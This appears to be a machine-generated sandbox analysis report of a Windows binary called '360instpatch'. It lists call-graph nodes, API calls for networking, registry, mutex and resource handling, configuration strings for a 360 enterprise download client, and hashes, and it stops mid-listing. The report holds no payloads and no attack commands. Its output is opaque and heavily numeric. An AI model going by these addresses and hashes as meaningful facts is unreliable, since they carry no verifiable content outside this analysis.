API calls 4 library calls 150799->150885 150804 b67358 150800->150804 150808 b673df 150800->150808 150801->150794 150889 b6510b GetDlgCtrlID SetBkColor 150801->150889 150812 b6639a 150804->150812 150806 b673a0 150806->150792 150852 b655b0 150806->150852 150808->150794 150810 b67404 150808->150810 150851->150806 150853 b655bc __EH_prolog3_GS 150852->150853 151025 b665a6 150862->151025 150880->150792 150881->150792 150882->150793 150883->150792 150884->150793 150885->150792 150887->150792 150888->150792 150889->150794 151026 b665b2 __EH_prolog3 151025->151026 151027 b665c7 GetDlgItem 151026->151027 151147 b5f7d0 151027->151147 151148 b5f7d9 151147->151148 151149 b277af 18 API calls 151148->151149 151179 b9ad5e 151182 b9ac98 151179->151182 151185 b9aca4 _setlocale 151182->151185 151183 b9acb7 151232 b998d1 67 API calls __getptd_noexit 151183->151232 151185->151183 151187 b9aced 151185->151187 151186 b9acbc 151233 b9a5b1 6 API calls 2 library calls 151186->151233 151201 bb18a1 151187->151201 151190 b9acf2 151202 bb18ad _setlocale 151201->151202 151203 ba339f __lock 67 API calls 151202->151203 151204 bb18bb 151203->151204 151205 bb1937 151204->151205 151216 bb1930 151204->151216 151240 ba32dc 67 API calls 8 library calls 151204->151240 151241 bad2cc 68 API calls __lock 151204->151241 151242 bad33a LeaveCriticalSection LeaveCriticalSection _doexit 151204->151242 151243 ba0596 67 API calls _malloc 151205->151243 151208 bb1941 151208->151216 151244 bab7c4 InitializeCriticalSectionAndSpinCount _setlocale 151208->151244 151209 bb19c5 _setlocale 151209->151190 151213 bb1966 151214 bb1971 151213->151214 151215 bb1984 EnterCriticalSection 151213->151215 151215->151216 151237 bb19d0 151216->151237 151232->151186 151245 ba32ad LeaveCriticalSection 151237->151245 151239 bb19d7 151239->151209 151240->151204 151241->151204 151242->151204 151243->151208 151244->151213 151245->151239 151251 6cd9b931 151252 6cd9b938 151251->151252 151253 6cd9b93e PathFileExistsW 151252->151253 151254 6cd9b958 151252->151254 151253->151254 151255 6cd9b94d PathIsDirectoryW 151253->151255 151255->151254 151256 b7895e InternetGetConnectedState 151257 b78972 151256->151257 151258 b78978 151257->151258 151261 b788eb 69 API calls 2 library calls 151257->151261 151260 b78982 151261->151260 151262 b34c5a 151263 b34c64 151262->151263 151264 b34c68 TlsGetValue 151262->151264 151267 b33dcb 151263->151267 151264->151263 151266 b34c83 151268 b33dd7 __EH_prolog3 151267->151268 151269 b31e07 RaiseException 151268->151269 151270 b33de1 151269->151270 151271 b2dd3e 2 API calls 151270->151271 151272 b33dfb 151271->151272 151273 b32a00 3 API calls 151272->151273 151274 b33e03 std::locale::_Init ctype 151273->151274 151274->151266 151275 6bf37d19 151277 6bf37d2b _memset __write_nolock 151275->151277 151276 6bf384d6 _strlwr_s_l_stat 5 API calls 151278 6bf37da8 151276->151278 151279 6bf2fcc6 recvfrom 151277->151279 151282 6bf37d82 151277->151282 151280 6bf37d79 151279->151280 151281 6bf37d94 WSAGetLastError 151280->151281 151280->151282 151281->151282 151282->151276 151283 6cd3ae3f 151285 6cd3ae4b __EH_prolog3 151283->151285 151284 6cd3ae98 numpunct 151285->151284 151291 6cd3ad48 _memset PathCombineW 151285->151291 151287 6cd3ae67 151287->151284 151288 6cd3ae6b 151287->151288 151294 6cd3a35f _memset GetModuleFileNameW _memset __wcslwr 151288->151294 151290 6cd3ae82 151290->151284 151295 6cd3ab57 151291->151295 151293 6cd3ad96 151293->151287 151294->151290 151296 6cd3ab63 __EH_prolog3 151295->151296 151297 6cd3ab87 CreateXMLDOMDocument 151296->151297 151299 6cd3ac0c numpunct 151296->151299 151297->151299 151302 6cd3ab95 151297->151302 151298 6cd3abcd VariantClear 151298->151299 151298->151302 151299->151293 151302->151298 151302->151299 151303 6cd3a0ab 9 API calls 151302->151303 151304 6cd3aa89 std::runtime_error::runtime_error __CxxThrowException 151302->151304 151303->151302 151304->151302 151305 b2bcde 151306 b2bf2b 151305->151306 151310 b2bce6 151305->151310 151307 b573d5 154 API calls 151306->151307 151308 b2bf33 151307->151308 151309 b2b9b4 86 API calls 151308->151309 151312 b2bf3c 151309->151312 151310->151306 151311 b2bcfa 151310->151311 151379 b2bff4 151311->151379 151556 b603a0 119 API calls 4 library calls 151312->151556 151314 b2bd04 151316 b2bd16 151314->151316 151317 b2bd08 151314->151317 151326 b2bca0 ctype 151327 b94647 __except1 5 API calls 151326->151327 151331 b2bf7e 151327->151331 151380 b2c000 __EH_prolog3 151379->151380 151557 b802e1 151380->151557 151385 b2c029 std::locale::_Init 151385->151314 151556->151326 151558 b802ee 151557->151558 151586 b80145 151558->151586 151561 b80877 151562 b8089b __EH_prolog3 151561->151562 151563 b1ba90 std::_String_base::_Xlen 2 API calls 151562->151563 151587 b94550 _memset 151586->151587 151588 b80157 FindResourceW 151587->151588 151589 b8016f SizeofResource LoadResource 151588->151589 151590 b2c022 151588->151590 151589->151590 151591 b8018a LockResource 151589->151591 151590->151385 151590->151561 151591->151590 152224 6bf2fc9e 152225 6bf2fcb0 recv 152224->152225 152226 6bf2fca7 152224->152226 152226->152225 152227 6cd34cbd 152229 6cd34cc8 152227->152229 152228 6cd34d05 152229->152228 152230 6cd34cea SetWindowLongW 152229->152230 152232 6cd2846a CallWindowProcW 152230->152232 152232->152228 152233 b7bd58 CreateMutexW 152234 b7bd75 GetLastError 152233->152234 152235 b7bdc1 152233->152235 152236 b7bda2 EnterCriticalSection 152234->152236 152237 b7bd82 CloseHandle FindWindowW 152234->152237 152240 b7bc34 76 API calls 152236->152240 152237->152235 152239 b7bdb9 LeaveCriticalSection 152239->152235 152240->152239 152241 6bf5e780 152246 6bee6e40 GetCurrentProcessId 152241->152246 152243 6bf5e785 152244 6bf3ae4b __cinit 74 API calls 152243->152244 152245 6bf5e78f 152244->152245 152247 6bf3c914 __snwprintf 103 API calls 152246->152247 152248 6bee6ea0 CreateMutexW 152247->152248 152249 6bee6ec8 GetLastError 152248->152249 152250 6bee7034 152248->152250 152252 6bee6ede _memset 152249->152252 152253 6bee6ed5 WaitForSingleObject 152249->152253 152251 6bf384d6 _strlwr_s_l_stat 5 API calls 152250->152251 152254 6bee7054 152251->152254 152284 6bee6b30 103 API calls 4 library calls 152252->152284 152253->152252 152254->152243 152256 6bee6f0a 152257 6bee6f45 GetProcessHeap 152256->152257 152285 6bf3db6e 67 API calls _vscan_fn 152256->152285 152259 6bee6f5f 152257->152259 152260 6bee6f4f HeapAlloc 152257->152260 152262 6bee6f73 152259->152262 152286 6bee7290 TlsAlloc RaiseException _memset __CxxThrowException@8 152259->152286 152260->152259 152261 6bee6f30 152261->152257 152263 6bee6f38 152261->152263 152265 6bee6f97 152262->152265 152266 6bee6f71 152262->152266 152267 6bee7015 ReleaseMutex 152263->152267 152269 6bf3bffc __swprintf 103 API calls 152265->152269 152266->152262 152287 6bf3848a RaiseException 152266->152287 152267->152250 152270 6bee702d CloseHandle 152267->152270 152271 6bee6fae 152269->152271 152270->152250 152288 6bee6c70 103 API calls 3 library calls 152271->152288 152284->152256 152285->152261 152286->152266 152287->152265 152292 b2adc4 152303 b95421 152292->152303 152294 b2ade8 GetModuleFileNameW 152295 b1ba90 std::_String_base::_Xlen 2 API calls 152294->152295 152296 b2ae06 152295->152296 152297 b1bf10 78 API calls 152296->152297 152298 b2ae17 152297->152298 152304 b2995e 152298->152304 152303->152294 152305 b2996a __EH_prolog3_catch 152304->152305 152324 b274b2 CLSIDFromProgID 152305->152324 152317 b299a1 std::locale::_Init 152325 b274db CoCreateInstance 152324->152325 152326 b274ef 152324->152326 152325->152326 152327 b94647 __except1 5 API calls 152326->152327 152328 b274fb 152327->152328 152328->152317 152329 b27feb 152328->152329 152330 b27ff9 SysFreeString 152329->152330 152341 6bf2e488 152343 6bf2e4af 152341->152343 152342 6bf2e707 DefWindowProcW 152354 6bf2e4d2 ctype 152342->152354 152343->152342 152344 6bf2e4c7 152343->152344 152345 6bf2e4d9 152343->152345 152635 6bf2cde8 8 API calls ctype 152344->152635 152348 6bf2e4e1 152345->152348 152349 6bf2e4ee 152345->152349 152346 6bf384d6 _strlwr_s_l_stat 5 API calls 152350 6bf2e720 152346->152350 152392 6bf2e190 152348->152392 152352 6bf2e4f6 152349->152352 152353 6bf2e507 152349->152353 152636 6bf2df0e 122 API calls 152352->152636 152356 6bf2e586 152353->152356 152357 6bf2e50f _memset 152353->152357 152354->152346 152358 6bf2e58e 152356->152358 152359 6bf2e5bf 152356->152359 152438 6bf2e39f 152357->152438 152358->152354 152365 6bf2d24f 114 API calls 152358->152365 152360 6bf2e601 152359->152360 152361 6bf2e5c7 152359->152361 152362 6bf2e609 152360->152362 152363 6bf2e65f 152360->152363 152448 6bf2d24f 152361->152448 152362->152354 152371 6bf2d24f 114 API calls 152362->152371 152367 6bf2e667 152363->152367 152368 6bf2e6b4 152363->152368 152369 6bf2e59c 152365->152369 152367->152354 152374 6bf2d24f 114 API calls 152367->152374 152372 6bf2e6d2 152368->152372 152373 6bf2e6bc 152368->152373 152369->152354 152637 6bf2dbab 122 API calls ctype 152369->152637 152379 6bf2e617 _memset 152371->152379 152372->152342 152377 6bf2d24f 114 API calls 152372->152377 152373->152354 152638 6bf2e42f 75 API calls 152373->152638 152381 6bf2e675 _memset 152374->152381 152378 6bf2e6eb 152377->152378 152639 6bf389a5 67 API calls 7 library calls 152378->152639 152379->152354 152388 6bf32b06 73 API calls 152379->152388 152391 6bf26f3f 15 API calls 152379->152391 152506 6bf37104 152379->152506 152578 6bf32f93 152379->152578 152595 6bf3304e 152379->152595 152381->152354 152601 6bf17a33 152381->152601 152632 6bf2fe51 152381->152632 152382 6bf2e701 152382->152342 152388->152354 152391->152354 152393 6bf2e19c __EH_prolog3 152392->152393 152640 6bf2c56b GetCurrentThreadId 152393->152640 152396 6bf2e1b1 152397 6bf1a60a 75 API calls 152396->152397 152398 6bf2e1b9 152397->152398 152646 6beef7ae 152398->152646 152400 6bf2e1cf 152926 6bf3074a 152438->152926 152442 6bf2e3ce 152445 6bf2e3e1 152446 6bf2e410 closesocket 152445->152446 152447 6bf2e425 152445->152447 152950 6bf34a9e 6 API calls 152445->152950 152446->152445 152446->152447 152447->152354 152449 6bf2c56b 114 API calls 152448->152449 152450 6bf2d25d 152449->152450 152451 6bf2ca48 ctype 6 API calls 152450->152451 152452 6bf2d26f 152451->152452 152984 6bf2d1c5 152452->152984 152507 6bf3711b 152506->152507 152513 6bf3717d ctype 152506->152513 152508 6bf37483 152507->152508 152509 6bf37122 GetTickCount 152507->152509 152510 6bf37182 GetTickCount 152507->152510 152511 6bf372b2 GetTickCount 152507->152511 152512 6bf37447 ctype 152507->152512 152507->152513 152514 6bf3738f ctype 152507->152514 152515 6bf3749e 152507->152515 152516 6bf3723c GetTickCount 152507->152516 152517 6bf373ec GetTickCount 152507->152517 153100 6bf33c06 114 API calls 152508->153100 152524 6bf37c17 8 API calls 152509->152524 152522 6bf3719f 152510->152522 152551 6bf37171 152510->152551 152525 6bf372c6 152511->152525 152571 6bf37308 moneypunct ctype 152511->152571 152521 6bf37456 inet_addr htonl 152512->152521 152513->152354 152526 6bf3739f inet_addr htonl 152514->152526 153103 6bf33c06 114 API calls 152515->153103 152518 6bf37255 152516->152518 152519 6bf37288 152516->152519 152523 6bf37400 152517->152523 152530 6bf37210 moneypunct ctype 152517->152530 152523->152530 152530->152513 152579 6bf32f9f __EH_prolog3 152578->152579 152580 6bf33027 152579->152580 152581 6bf32fab htonl 152579->152581 152583 6bf3303d std::runtime_error::runtime_error ctype 152580->152583 153113 6bf32476 152580->153113 152582 6befb865 ctype 111 API calls 152581->152582 152583->152354 152596 6bf33031 152595->152596 152597 6bf32476 122 API calls 152596->152597 152598 6bf33036 152597->152598 152602 6bf17a3f __EH_prolog3 152601->152602 152603 6bf17b70 152602->152603 152604 6bf17a58 152602->152604 152633 6bf2fe57 152632->152633 152634 6bf2fe5f connect 152632->152634 152633->152634 152634->152354 152635->152354 152636->152354 152637->152354 152638->152354 152639->152382 152641 6bf2c5b3 GetTickCount 152640->152641 152642 6bf2c57c GetTickCount 152640->152642 152641->152396 152643 6bf2c5af 152642->152643 152644 6bf2c595 GetTickCount 152642->152644 152643->152641 152736 6bf23fed 111 API calls 3 library calls 152644->152736 152647 6beef7c0 152646->152647 152649 6beef7c5 152646->152649 152737 6bef8e9e 75 API calls 4 library calls 152647->152737 152650 6bee7c8f 75 API calls 152649->152650 152657 6beef80b ctype 152649->152657 152651 6beef7db 152650->152651 152657->152400 152736->152643 152927 6bf30767 152926->152927 152928 6bf3076c WSASetLastError 152927->152928 152951 6bf305f0 152927->152951 152934 6bf3077b 152928->152934 152931 6bf30787 152931->152928 152932 6bf30792 152931->152932 152932->152934 152935 6bf307af socket 152932->152935 152933 6bf384d6 _strlwr_s_l_stat 5 API calls 152936 6bf2e3bc 152933->152936 152934->152933 152936->152445 152948 6bf2e055 122 API calls ctype 152936->152948 152948->152442 152950->152445 152952 6bf305fc __EH_prolog3 152951->152952 152953 6bf3060c GetCurrentThreadId EnterCriticalSection 152952->152953 152955 6bf30604 std::runtime_error::runtime_error 152952->152955 152954 6bf3067d 152953->152954 152957 6bf3062b 152953->152957 152956 6bf38425 ctype 75 API calls 152954->152956 152955->152931 152959 6bf30684 152956->152959 152961 6bf38425 ctype 75 API calls 152957->152961 152969 6bf30673 LeaveCriticalSection 152957->152969 152963 6bf30640 152961->152963 152969->152955 152993 6bf2d105 152984->152993 153103->152513 153168 6beeb995 153173 6beeb3f0 153168->153173 153171 6beeb9b0 153172 6beea564 FreeLibraryAndExitThread 153172->153171 153181 6beeb402 _memset __write_nolock ___TypeMatch 153173->153181 153174 6beeb970 153175 6bf384d6 _strlwr_s_l_stat 5 API calls 153174->153175 153176 6beeb98d 153175->153176 153176->153171 153176->153172 153177 6beeb547 153245 6beeac64 239 API calls ctype 153177->153245 153178 6beeb717 inet_addr 153184 6beeb731 gethostbyname 153178->153184 153181->153174 153181->153177 153182 6beeb5a1 153181->153182 153185 6beeb49c 153181->153185 153182->153178 153183 6beeb5da 153182->153183 153246 6beeaf47 148 API calls 8 library calls 153183->153246 153191 6beeb83c _memset 153184->153191 153192 6beeb76d std::runtime_error::~runtime_error 153184->153192 153228 6bf325d6 153185->153228 153242 6bf33cfe 153185->153242 153188 6beeb5ef 153189 6beeb5f9 _memset 153188->153189 153190 6beeb714 153188->153190 153247 6bf23d26 MultiByteToWideChar MultiByteToWideChar 153189->153247 153190->153178 153254 6bf23d26 MultiByteToWideChar MultiByteToWideChar 153191->153254 153193 6beeb7e1 153192->153193 153250 6beeaf2a 75 API calls 2 library calls 153192->153250 153193->153185 153193->153191 153198 6beeb814 inet_addr 153193->153198 153194 6beeb562 153259 6beeaf07 67 API calls 2 library calls 153194->153259 153198->153185 153198->153191 153199 6beeb875 153210 6beeb889 153199->153210 153255 6befba20 75 API calls 2 library calls 153199->153255 153201 6beeb79b 153251 6beeaf2a 75 API calls 2 library calls 153201->153251 153205 6beeb7a8 153252 6beeaf2a 75 API calls 2 library calls 153205->153252 153206 6beeb673 gethostbyname 153206->153185 153224 6beeb694 153206->153224 153208 6beeb8d6 153208->153185 153217 6beeb919 153208->153217 153209 6beeb637 153209->153206 153218 6bf23f0c 111 API calls 153209->153218 153248 6bf23d67 103 API calls __snwprintf 153209->153248 153256 6befba20 75 API calls 2 library calls 153210->153256 153211 6beeb7b2 153253 6bf0ea0d 121 API calls 153211->153253 153214 6beeb8b7 153214->153208 153257 6beeac64 239 API calls ctype 153214->153257 153218->153209 153222 6beeb6fe 153222->153185 153224->153185 153224->153222 153225 6bf23f0c 111 API calls 153224->153225 153249 6bf23d67 103 API calls __snwprintf 153224->153249 153225->153224 153229 6bf325e1 153228->153229 153230 6bf32637 153228->153230 153260 6bf32243 153229->153260 153231 6bf38425 ctype 75 API calls 153230->153231 153234 6bf3263e 153231->153234 153237 6bf31cb9 76 API calls 153234->153237 153235 6bf38425 ctype 75 API calls 153236 6bf325f6 153235->153236 153239 6befac19 68 API calls 153236->153239 153238 6bf32634 ctype 153237->153238 153238->153194 153240 6bf32610 htonl 153239->153240 153243 6bf37b9f 76 API calls 153242->153243 153244 6bf33d12 153243->153244 153244->153194 153245->153194 153246->153188 153247->153209 153248->153209 153249->153224 153250->153201 153251->153205 153252->153211 153254->153199 153255->153210 153256->153214 153257->153208 153259->153174 153263 6bf32273 _memset _strcat __mbschr_l 153260->153263 153265 6bf322b3 153260->153265 153261 6bf384d6 _strlwr_s_l_stat 5 API calls 153262 6bf322dd 153261->153262 153262->153235 153263->153265 153266 6bf3d885 91 API calls strtoxl 153263->153266 153265->153261 153266->153265 153267 b53f4a 153268 b53f55 153267->153268 153269 b53f68 GetWindowLongW 153267->153269 153276 b53ee0 CallWindowProcW 153268->153276 153277 b53ee0 CallWindowProcW 153269->153277 153272 b53f87 153273 b53f95 GetWindowLongW 153272->153273 153275 b53f63 153272->153275 153274 b53fa2 SetWindowLongW 153273->153274 153273->153275 153274->153275 153276->153275 153277->153272

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 6BF0FE46 Relevance: 65.2, APIs: 20, Strings: 17, Instructions: 440COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 6bf0fe46-6bf0fe5d call 6befaf8a 3 6bf10250-6bf1026e call 6bf04c30 0->3 4 6bf0fe63-6bf0fe80 call 6bf04c30 0->4 11 6bf10270 3->11 12 6bf10273-6bf1027c call 6befaf8a 3->12 9 6bf0fe82 4->9 10 6bf0fe8c-6bf0fe93 4->10 9->10 13 6bf0fe95 10->13 14 6bf0fe98-6bf0fea1 call 6befaf8a 10->14 11->12 19 6bf102b1-6bf102ba 12->19 20 6bf1027e-6bf10288 call 6bf04c30 12->20 13->14 23 6bf10240-6bf1024b call 6bee8514 14->23 24 6bf0fea7-6bf0feae 14->24 21 6bf102bc 19->21 22 6bf102bf-6bf102fe call 6befaf8a wsprintfW 19->22 30 6bf1028d-6bf102ac call 6bee8fa1 call 6bee8514 20->30 21->22 38 6bf10305-6bf1030c 22->38 23->3 28 6bf0feb0 24->28 29 6bf0feb3-6bf0ff0b call 6bf0fd50 call 6bf38390 call 6bf0e124 call 6bf38001 24->29 28->29 52 6bf0ffc1-6bf0ffc8 29->52 53 6bf0ff11-6bf0ff70 call 6bf23f7c call 6bf38390 call 6bf23ce4 call 6bf3aed0 29->53 30->19 40 6bf10315 38->40 41 6bf1030e-6bf10313 38->41 43 6bf10317-6bf10328 call 6bf3b738 40->43 41->40 41->43 50 6bf1032a 43->50 51 6bf1032d-6bf1033e call 6bf3b738 43->51 50->51 59 6bf10340 51->59 60 6bf10343-6bf10354 call 6bf3b738 51->60 57 6bf0ffca 52->57 58 6bf0ffcd-6bf0ffe9 GetPrivateProfileIntW 52->58 83 6bf0ff72-6bf0ff82 inet_addr 53->83 84 6bf0ffab-6bf0ffb5 inet_addr 53->84 57->58 62 6bf0ffeb 58->62 63 6bf0ffee-6bf10045 GetPrivateProfileIntW call 6bf38390 call 6bf0e124 call 6bf38001 58->63 59->60 70 6bf10356 60->70 71 6bf10359-6bf10368 60->71 62->63 87 6bf1004b-6bf100ae call 6bf23f7c call 6bf38390 call 6bf23ce4 call 6bf3aed0 63->87 88 6bf100ff-6bf1014a call 6bf38390 call 6bf0e124 call 6bf38001 63->88 70->71 71->38 74 6bf1036a-6bf10395 call 6befac19 71->74 85 6bf10397 74->85 86 6bf1039c-6bf11376 call 6bee8514 * 2 call 6bf384d6 74->86 91 6bf0ff84-6bf0ff95 83->91 92 6bf0ff97-6bf0ffa5 call 6bf3aed0 83->92 84->52 90 6bf0ffb7-6bf0ffba 84->90 85->86 120 6bf100b0-6bf100c0 inet_addr 87->120 121 6bf100e9-6bf100f3 inet_addr 87->121 115 6bf10150-6bf1019d call 6bf38390 call 6bf23ce4 call 6bf3aed0 88->115 116 6bf101ee-6bf10214 call 6bf0e124 call 6bf38001 88->116 90->52 91->92 97 6bf0ffa7-6bf0ffa9 91->97 92->83 92->97 97->52 97->84 141 6bf101d8-6bf101e2 inet_addr 115->141 142 6bf1019f-6bf101af inet_addr 115->142 135 6bf10216-6bf1022c call 6bf23f7c call 6bf59fd7 116->135 136 6bf1022f-6bf1023b call 6bee8514 116->136 125 6bf100c2-6bf100d3 120->125 126 6bf100d5-6bf100e3 call 6bf3aed0 120->126 121->88 128 6bf100f5-6bf100f8 121->128 125->126 129 6bf100e5-6bf100e7 125->129 126->120 126->129 128->88 129->88 129->121 135->136 136->23 141->116 144 6bf101e4-6bf101e7 141->144 146 6bf101b1-6bf101c2 142->146 147 6bf101c4-6bf101d2 call 6bf3aed0 142->147 144->116 146->147 149 6bf101d4-6bf101d6 146->149 147->142 147->149 149->116 149->141
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BEFAF8A: GetFileAttributesW.KERNEL32(000000FF,6BF0FE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,6BFCC288,00000000), ref: 6BEFAF8E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0FED6
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF0FF03
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0FF38
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF0FF76
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF0FFAC
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(EntClient,TRPort,00000050,?), ref: 6BF0FFDB
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(EntClient,EntNat,000000FF,?), ref: 6BF0FFF7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10014
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF1003D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10076
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF100B4
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF100EA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10115
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF10142
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10165
                                                                                                                                                                                                                • Part of subcall function 6BF23CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,6BF23E87,?,?,0000083F), ref: 6BF23CFD
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF101A3
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF101D9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF1020C
                                                                                                                                                                                                              • __wcslwr.LIBCMT ref: 6BF10227
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF102E0
                                                                                                                                                                                                                • Part of subcall function 6BF04C30: __EH_prolog3.LIBCMT ref: 6BF04C37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetinet_addr$_wcslen$PrivateProfile$AttributesByteCharFileH_prolog3MultiWide__wcslwrwsprintf
                                                                                                                                                                                                              • String ID: "$EntClient$EntNat$FIVESIZE$P2PHAVESIZE$PdownList$PolicyControl%d$SDServer$SINGLESIZE$STServer$TRPort$TRServer$[CTaskMgr::__update_config] PdownList:%s$[CTaskMgr::__update_config] STServer:%s$[CTaskMgr::__update_config] TRServer:%s$\360EntClient_download.ini$\livep.dat
                                                                                                                                                                                                              • API String ID: 1263679763-4273410730
                                                                                                                                                                                                              • Opcode ID: 8bb4d192d8c301a36884dcb9b270d9320bbf21e4eaf70434efd4993b0ad08e53
                                                                                                                                                                                                              • Instruction ID: cce873792bd0efa49f1aed7b7fde472959aed5d4b881844fb0e829c9cf6f032d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb4d192d8c301a36884dcb9b270d9320bbf21e4eaf70434efd4993b0ad08e53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F1F17380424AABDB21DFB4CC55FEE37A8EF05314F100529F918EB1A1EB7DA65587A0
                                                                                                                                                                                                              Function 6BF0F494 Relevance: 51.2, APIs: 16, Strings: 13, Instructions: 498registrysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 193 6bf0f494-6bf0f4cc call 6bf38e24 GetTickCount 196 6bf0f4e7-6bf0f4ef 193->196 197 6bf0f4ce-6bf0f4dd call 6bf26968 193->197 199 6bf0f4f5-6bf0f509 196->199 200 6bf0fa9a-6bf0fabc call 6bf384d6 196->200 197->196 203 6bf0f50b 199->203 204 6bf0f50e-6bf0f518 199->204 203->204 206 6bf0f5ce-6bf0f5d6 204->206 207 6bf0f51e-6bf0f525 204->207 209 6bf0f6a8-6bf0f6e8 call 6bf2ca48 * 2 call 6bf1ef1e 206->209 210 6bf0f5dc-6bf0f5e2 206->210 207->206 208 6bf0f52b-6bf0f564 call 6bf2ca48 * 2 call 6bf1ef1e 207->208 208->206 230 6bf0f566-6bf0f57b call 6bef135f WaitForSingleObject 208->230 231 6bf0f90b-6bf0f918 209->231 232 6bf0f6ee-6bf0f6f6 209->232 210->209 213 6bf0f5e8-6bf0f5f6 call 6bf274a3 210->213 213->209 222 6bf0f5fc-6bf0f614 call 6bf26bc4 call 6bf27322 213->222 239 6bf0f61a-6bf0f62d call 6bf26be8 222->239 240 6bf0f69c-6bf0f6a3 call 6bf27317 222->240 248 6bf0f587-6bf0f5a9 CloseHandle call 6bf2c882 call 6bf2d2ab 230->248 249 6bf0f57d-6bf0f585 call 6bf2c882 230->249 234 6bf0f91a-6bf0f91e 231->234 235 6bf0f92d-6bf0f93f call 6bf26a0c 231->235 237 6bf0f6f7-6bf0f70a call 6bef135f call 6bf0b868 232->237 234->235 241 6bf0f920-6bf0f92a 234->241 235->200 254 6bf0f945-6bf0f951 call 6bf0ddb9 call 6bf05da0 235->254 256 6bf0f70f-6bf0f716 237->256 257 6bf0f692-6bf0f69a call 6bf26bd1 239->257 258 6bf0f62f-6bf0f64f call 6bf23f7c 239->258 240->209 241->235 266 6bf0f5ae-6bf0f5c9 call 6bf2ca48 call 6bf1ef1e 248->266 249->266 274 6bf0f956-6bf0f964 254->274 263 6bf0f725-6bf0f74e call 6bf38390 call 6bf07a6e 256->263 264 6bf0f718-6bf0f720 call 6bf33d42 256->264 257->240 258->257 276 6bf0f651-6bf0f65c call 6bf3ae62 258->276 288 6bf0f754-6bf0f760 263->288 289 6bf0f8c9-6bf0f902 call 6beedcf2 call 6bf2ca48 call 6bf1ef1e 263->289 264->263 266->230 287 6bf0f5cb 266->287 274->200 278 6bf0f96a-6bf0f983 call 6bf269f6 274->278 290 6bf0f668-6bf0f68f call 6bf26cc7 call 6bf23f7c 276->290 291 6bf0f65e-6bf0f666 276->291 292 6bf0f985 278->292 293 6bf0f9c8-6bf0f9e0 call 6bf26a04 278->293 287->206 288->289 294 6bf0f766-6bf0f77a call 6bf26dcb 288->294 289->237 324 6bf0f908 289->324 290->257 291->257 291->290 299 6bf0f987-6bf0f989 292->299 300 6bf0f98b-6bf0f992 292->300 293->200 310 6bf0f9e6 293->310 294->289 312 6bf0f780-6bf0f7a2 RegQueryValueExW 294->312 299->293 299->300 300->293 306 6bf0f994-6bf0f9ad call 6bf269f6 call 6bf269f0 300->306 332 6bf0f9b3-6bf0f9b6 306->332 333 6bf0f9af-6bf0f9b1 306->333 316 6bf0f9f0-6bf0f9f7 310->316 317 6bf0f9e8-6bf0f9ea 310->317 313 6bf0f7a4-6bf0f7a7 312->313 314 6bf0f7ac-6bf0f7d0 RegQueryValueExW 312->314 313->314 319 6bf0f7d2-6bf0f7d5 314->319 320 6bf0f7da-6bf0f7fe RegQueryValueExW 314->320 316->200 322 6bf0f9fd-6bf0fa16 call 6bf26a04 call 6bf269fe 316->322 317->200 317->316 319->320 325 6bf0f800-6bf0f803 320->325 326 6bf0f808-6bf0f82c RegQueryValueExW 320->326 343 6bf0fa18-6bf0fa1a 322->343 344 6bf0fa1c-6bf0fa1f 322->344 324->231 325->326 329 6bf0f836-6bf0f85a RegQueryValueExW 326->329 330 6bf0f82e-6bf0f831 326->330 334 